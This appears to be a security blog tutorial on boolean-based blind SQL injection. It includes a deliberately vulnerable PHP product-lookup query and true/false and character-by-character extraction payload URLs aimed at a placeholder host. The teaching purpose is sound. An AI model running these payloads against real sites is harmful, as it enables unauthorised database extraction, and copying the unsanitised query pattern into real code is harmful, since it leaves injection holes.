Thilan Dissanayaka Application Security Apr 26

Boolean based Blind SQL Injection

Blind SQL Injection happens when:

There is a SQL injection vulnerability,

BUT the application does not show any SQL errors or query outputs directly.

In this case, an attacker has to ask questions to the database and observe how the server behaves to extract information bit by bit.

There are two main types:

Boolean-based blind SQLi (based on true/false responses)

Time-based blind SQLi (based on delay in server response)

Real-World Example Setup Imagine a product page with a URL like:

bash Copy Edit http://victim.com/product.php?id=5 and the vulnerable backend PHP code:

php Copy Edit <?php $id = $_GET['id']; $query = "SELECT * FROM products WHERE id = '$id'"; $result = mysqli_query($conn, $query); if (mysqli_num_rows($result) > 0) { // Display the product details $row = mysqli_fetch_assoc($result); echo "Product Name: " . $row['name']; } else { echo "No product found."; } ?> Problems:

No sanitization

User input directly used in SQL query

BUT importantly:

The page only says "Product found" or "No product found"

It does NOT show any SQL error messages or database outputs!

Boolean-Based Blind SQL Injection Basic Attack Idea: Inject a condition that changes the page behavior depending on TRUE or FALSE.

Example payload:

bash Copy Edit http://victim.com/product.php?id=5' AND 1=1 -- 1=1 is TRUE.

So the product page loads normally.

Payload to test FALSE:

bash Copy Edit http://victim.com/product.php?id=5' AND 1=2 -- 1=2 is FALSE.

The page now says "No product found".

Extracting Data Step by Step We can guess characters one by one.

Example: Try to extract the first letter of the database name:

sql Copy Edit ' AND SUBSTRING(database(),1,1)='a' -- URL encoded:

bash Copy Edit http://victim.com/product.php?id=5'%20AND%20SUBSTRING(database(),1,1)='a'%20--+ If the first letter is 'a', page shows "Product found".

Otherwise, "No product found".

We can automate this with a tool like SQLMap, or manually brute-force character by character.

ALSO READ
How does SLL work?
May 17 Cryptography

Every time you see that small padlock icon in your browser's address bar, you're witnessing one of the internet's most important security technologies at work. This tiny symbol represents....

Kafka - Interview preparation guide
Jan 28 Interview Guides

## What is Apache Kafka? Apache Kafka is a distributed event streaming platform designed for high-throughput, fault-tolerant, and real-time data streaming. It is used for building real-time data....

SQL injection login bypass
Apr 26 Application Security

SQL Injection (SQLi) is one of the oldest and most fundamental web application vulnerabilities. While it’s becoming rarer in modern web apps due to better coding practices and frameworks,....

Remote Command Execution
Mar 23 Application Security

Remote Command Execution (RCE) is a critical security vulnerability that allows an attacker to execute arbitrary commands on a remote server. This vulnerability can lead to unauthorized access, data....

Observer Pattern explained simply
Apr 26 Software Architecture

When one object needs to notify many other objects about changes in its state **automatically**, the **Observer Pattern** steps in. ## What is the Observer Pattern? - Defines a....

Exploiting a  Stack Buffer Overflow  on Linux
May 11 Exploit development

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening.....